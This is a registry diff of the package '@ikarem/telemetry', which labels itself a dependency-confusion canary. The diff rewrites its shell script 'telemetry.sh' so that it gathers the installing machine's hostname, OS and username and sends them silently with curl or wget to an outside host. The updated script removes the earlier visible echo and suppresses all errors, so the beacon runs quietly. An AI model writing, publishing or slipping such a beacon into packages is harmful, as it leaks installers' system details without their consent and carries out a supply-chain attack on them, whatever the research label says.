@ikarem/telemetry 100.1.9 → 100.1.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/scripts/telemetry.sh +74 -17
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@ikarem/telemetry",
3
- "version": "100.1.9",
3
+ "version": "100.1.10",
4
4
  "description": "Research-only dependency confusion canary package",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/scripts/telemetry.sh CHANGED
@@ -1,27 +1,84 @@
1
1
  #!/bin/sh
2
- # Telemetry beacon script for supply-chain research
2
+ # Universal telemetry beacon (POSIX-safe)
3
3
 
4
- EVENT=$1
5
- HOST=$(hostname)
6
- OS=$(grep '^PRETTY_NAME' /etc/os-release | cut -d= -f2 | tr -d '"')
7
- USER=$(whoami)
8
- NONCE=$(head -c 12 /dev/urandom | base64 | tr -dc 'a-zA-Z0-9' | head -c 10)
4
+ EVENT="$1"
5
+ [ -z "$EVENT" ] && EVENT="unknown"
9
6
 
10
- # Function to URL-encode strings (handles spaces and special chars)
7
+ # -------- helpers --------
8
+
9
+ get_hostname() {
10
+ hostname 2>/dev/null || uname -n 2>/dev/null || echo "unknown"
11
+ }
12
+
13
+ get_os() {
14
+ if [ -f /etc/os-release ]; then
15
+ awk -F= '/^PRETTY_NAME=/{gsub(/"/,"",$2);print $2}' /etc/os-release
16
+ else
17
+ uname -s 2>/dev/null || echo "unknown"
18
+ fi
19
+ }
20
+
21
+ get_user() {
22
+ whoami 2>/dev/null || id -un 2>/dev/null || echo "unknown"
23
+ }
24
+
25
+ gen_nonce() {
26
+ if command -v base64 >/dev/null 2>&1; then
27
+ head -c 16 /dev/urandom | base64 | tr -dc 'a-zA-Z0-9' | head -c 10
28
+ else
29
+ date +%s 2>/dev/null || echo "nonce"
30
+ fi
31
+ }
32
+
33
+ # RFC 3986–safe URL encoding
11
34
  urlencode() {
12
- # Use printf and sed to replace unsafe chars
13
- printf '%s' "$1" | sed -e 's/ /%20/g' -e 's/"/%22/g' -e "s/'/%27/g"
35
+ printf '%s' "$1" | awk '
36
+ BEGIN {
37
+ for (i = 0; i < 256; i++) {
38
+ c = sprintf("%c", i)
39
+ if (c ~ /[A-Za-z0-9_.~-]/) o[c] = c
40
+ else o[c] = sprintf("%%%02X", i)
41
+ }
42
+ }
43
+ {
44
+ for (i = 1; i <= length($0); i++) {
45
+ c = substr($0, i, 1)
46
+ printf "%s", o[c]
47
+ }
48
+ }'
49
+ }
50
+
51
+ send_request() {
52
+ URL="$1"
53
+
54
+ if command -v curl >/dev/null 2>&1; then
55
+ curl -fsS "$URL" >/dev/null 2>&1 || true
56
+ elif command -v wget >/dev/null 2>&1; then
57
+ wget -qO- "$URL" >/dev/null 2>&1 || true
58
+ else
59
+ true
60
+ fi
14
61
  }
15
62
 
16
- ENC_HOST=$(urlencode "$HOST")
17
- ENC_OS=$(urlencode "$OS")
18
- ENC_USER=$(urlencode "$USER")
19
- ENC_NONCE=$(urlencode "$NONCE")
63
+ # -------- collect data --------
64
+
65
+ HOST="$(get_hostname)"
66
+ OS="$(get_os)"
67
+ USER="$(get_user)"
68
+ NONCE="$(gen_nonce)"
69
+
70
+ ENC_HOST="$(urlencode "$HOST")"
71
+ ENC_OS="$(urlencode "$OS")"
72
+ ENC_USER="$(urlencode "$USER")"
73
+ ENC_NONCE="$(urlencode "$NONCE")"
74
+ ENC_EVENT="$(urlencode "$EVENT")"
75
+
76
+ BASE_URL="https://reproduce-supply-chain.ikarem.meraki.hexlsi.com/evidence"
20
77
 
21
- URL="https://reproduce-supply-chain.ikarem.meraki.hexlsi.com/evidence?package=telemetry&ver=100.1.9&event=$EVENT&hostname=$ENC_HOST&os=$ENC_OS&whoami=$ENC_USER&nonce=$ENC_NONCE"
78
+ URL="$BASE_URL?package=telemetry&ver=100.1.9&event=$ENC_EVENT&hostname=$ENC_HOST&os=$ENC_OS&whoami=$ENC_USER&nonce=$ENC_NONCE"
22
79
 
23
- echo "Sending telemetry: $URL"
80
+ # -------- fire & forget --------
81
+ send_request "$URL"
24
82
 
25
- # Send telemetry, ignore errors so install/update doesn’t break
26
- curl -fsS "$URL" || true
83
+ exit 0
27
84